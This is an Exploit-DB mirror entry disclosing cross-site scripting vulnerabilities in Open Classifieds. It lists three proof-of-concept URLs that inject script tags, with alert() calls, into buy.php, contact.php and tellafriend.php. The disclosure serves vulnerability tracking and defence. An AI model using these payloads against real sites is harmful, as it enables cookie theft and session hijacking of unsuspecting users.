exploit-db-mirror/exploits/php/webapps/34655.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

9 lines
No EOL
710 B
Text

source: https://www.securityfocus.com/bid/43335/info
Open Classifieds is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/buy.php/?page=1>'><ScRiPt %0A%0D>alert(317235523215)%3B</ScRiPt>
http://www.example.com/contact.php?id=1<ScRiPt %0A%0D>alert(345135841734)%3B</ScRiPt>
http://www.example.com/tellafriend.php?id=1>"><ScRiPt %0A%0D>alert(366396570535)%3B</ScRiPt>